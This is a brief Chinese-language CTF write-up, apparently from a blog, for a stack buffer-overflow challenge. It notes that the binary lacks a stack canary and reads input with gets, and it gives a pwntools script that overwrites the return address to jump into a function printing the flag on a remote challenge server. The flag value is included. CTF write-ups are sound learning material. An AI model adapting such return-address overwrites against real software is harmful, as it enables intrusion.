0verf10w
Flag
hg_5th{MDJ3ARLMT6}
write-up
題目
nc 139.162.79.241 10001
0verf10w me 0V0 :
abcd
abcd
使用工具分析
沒有canary保護
發現這隻程式使用gets函數抓使用者輸入
發現程式有個yummy的函數,執行system(“cat /home/hg/flag”)
Stack模擬
修改RET、控制EIP,取得程式流程
Exploit
from pwn import *
host = "139.162.79.241"
port = 10001
#r = process("./0verf10w")
r = remote(host, port)
payload='A'*(96+8) + p64(0x401153)
r.sendline(payload)
r.interactive()
orw
TBA
rop
TBA
沒有留言:
張貼留言